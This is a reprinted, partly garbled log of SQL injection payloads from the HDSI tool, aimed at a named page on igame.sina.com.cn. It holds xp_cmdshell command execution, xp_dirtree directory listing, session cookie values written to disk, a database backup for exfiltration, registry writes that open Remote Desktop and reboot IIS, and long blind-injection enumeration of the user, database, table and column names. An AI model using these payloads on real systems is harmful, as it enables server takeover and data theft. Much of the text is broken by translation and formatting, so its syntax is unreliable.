Injection section of the HDSI 2.0 SQL statements parsed from a packet capture
Redo cmd
; Insert TB1 exec master. xp_cmdshell ' net user '--
exec master.dbo.sp_addextendedproc ' xp_cmdshell ', ' xplog70.dll '--
Command execution:
SQL:; ipconfig-all--
Dos:
;D ROP table comd_list; CREATE TABLE comd_list (comresult nvarchar ()) INSERT comd_list EXEC MASTER: xp_cmdshell
"Ipconfig
-all "--
get/plaza/event/new/crnt_event_view.asp?event_id=57
and (Select char (94) +cast (Count (1) as varchar (8000)) +char (94) from [Comd_list] Where 1=1) >0
Directory listing:
C:jiaozhu temporary table
;d ROP table Jiaozhu; CREATE TABLE Jiaozhu (DirName varchar), Diratt varchar (+), Dirfile varchar) INSERT Jiaozhu
Exec
MASTER.. Xp_dirtree "C:", 1,1--
get/plaza/event/new/crnt_event_view.asp?event_id=57
and (Select char (94) +cast (Count (1) as varchar (8000)) +char (94) from [Jiaozhu] Where 1=1) >0
File upload:
Local path: C:\Inetpub\wwwroot\cook.txt save location: C:
Database stored procedures:
; EXEC master. xp_cmdshell ' Echo
cdb_sid=3urzov;%20cdb_cookietime=2592000;%20cdb_auth=vgccbajbvqxvavmcvghtbfjuuqydbqdtv1bwvqokaqe6pwnx;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=d8d>c:\ '--
Database backup (the temporary table is deleted after the upload):
;D ROP Table [xiaopan];create table [dbo]. [Xiaopan] ([cmd] [text])--
Insert into Xiaopan (cmd) VALUES (' Echostr ')--
;d eclare @a sysname,@s nvarchar (4000) Select @a=db_name (), @s= ' c:/' backup database @a to [e-Mail protected] with
differential,format--
;D ROP Table [xiaopan]--
Opening port 3389 (Remote Desktop):
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' Software\microsoft\windows\currentversion\netcache ', ' Enable ', ' REG_SZ ', ' 0 ';-
---
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite @r, "SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon ', ' ShutdownWithoutLogon ', ' REG_SZ ', ' 0 ';----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' Software\policies\microsoft\windows\installer ', ' enableadmintsremote ', ' REG_DWORD ', 1;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite @r, "System\currentcontrolset\control
\terminal
Servert ', ' senabled ', ' REG_DWORD ', 1;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' System\currentcontrolset\services\termdd ', ' Start ', ' REG_DWORD ', 2;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite
@r, ' System\currentcontrolset\services\termservice ', ' Start ', ' REG_DWORD ', 2;----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. Xp_regwrite ' hkey_users ', '. DEFAULT\Keyboard
Layout\toggle ', ' hotkey ', ' REG_SZ ', ' 1 ';----
;d eclare @r varchar (255) Set @r= ' HKEY_LOCAL_MACHINE ' EXEC master. xp_cmdshell ' iisreset/reboot ';----
Injection analysis: numeric type; SQL error prompts turned off; open access
Use the keyword Gem Park "You play me to smoke" List of winners announced
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57
Multi-statement query support
Sub-query support
Permissions: public
Current user: dbo
Current database: Event
; Create table T_jiaozhu (Jiaozhu varchar (200))
and 1=1
and 1=2
and (select Count (1) from SYSObjects) >0
and (select Len (user)) <32
;d eclare @a int--
and (Is_srvrolemember (' sysadmin ')) =1
and (Is_member ("db_owner")) =1
and (select Len (user)) <16
and (select Len (user)) <4
and (select Len (user) <2
and (select Len (user)) <3
and (select Len (user)) <3
and (select Len (user)) <4
and (select ASCII (substring (user,1,1))) <80
and (select ASCII (substring (user,2,1))) <80
and (select ASCII (substring (user,3,1))) <80
and (select ASCII (substring)) user,1,1
and ( Select ASCII (substring (user,2,1))) <104
and (select ASCII (substring (user,3,1))) <104
and (select ASCII ( SUBSTRING (user,1,1))) <92
and (select ASCII (substring (user,2,1))) <92
and (select ASCII (substring (user, 3,1)) <116
and (select ASCII (substring (user,1,1))) <98
...
...
...
and (Select Len (db_name ())) <16
and (Select Len (db_name ())) <8
and (Select Len (db_name ())) <4
...
...
...
and (Select ASCII (substring (db_name (),)) <80
and (Select ASCII (substring (db_name (), 2,1)) <80
and (Select ASCII (substring (db_name (), 5,1)) <85
Cross-database:
Guessing the database name:
GET
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <8
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <4
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <6
and (select top 1 len (name) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <7
...
...
...
and (select top 1 ASCII (substring (name,2,1)) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY
dbid
DESC) <104
and (select top 1 ASCII (substring (name,3,1)) from (select top 2 dbid,name from [master]: [sysdatabases]) T ORDER BY
dbid
DESC) <104
...
...
...
and (select top 1 len (name) from (select Top 4 dbid,name from [master]: [sysdatabases]) T ORDER BY dbid Desc) <5
The account does not have SA permission on master, so cross-database access is not possible
Guessing the table name:
EventCategory
GET
and (select top 1 Unicode (substring (name,2,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char (85))
T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,11,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char
()) T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,12,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char
()) T
ORDER BY id DESC) < 80
and (select top 1 Unicode (substring (name,6,1)) from (select top 1 id,name from [EVENT]: sysobjects where Xtype=char (85))
T
ORDER BY id DESC) < 80
Guessing the column name:
GET
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <32
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <48
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <56
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <60
and (select COUNT (1) from EVENT: Syscolumns a,event. sysobjects B where a.id=b.id and B.name= ' EventCategory ') <62
and (select top 1 len (name) from (select top 1 a.id,a.name from EVENT: Syscolumns a,event. sysobjects B where
A.id=b.id and
B.name= ' EventCategory ' ORDER by a.name Desc] T ORDER BY name ASC) <35
Reprinted from: http://www.aspnetjia.com/Cont-204.html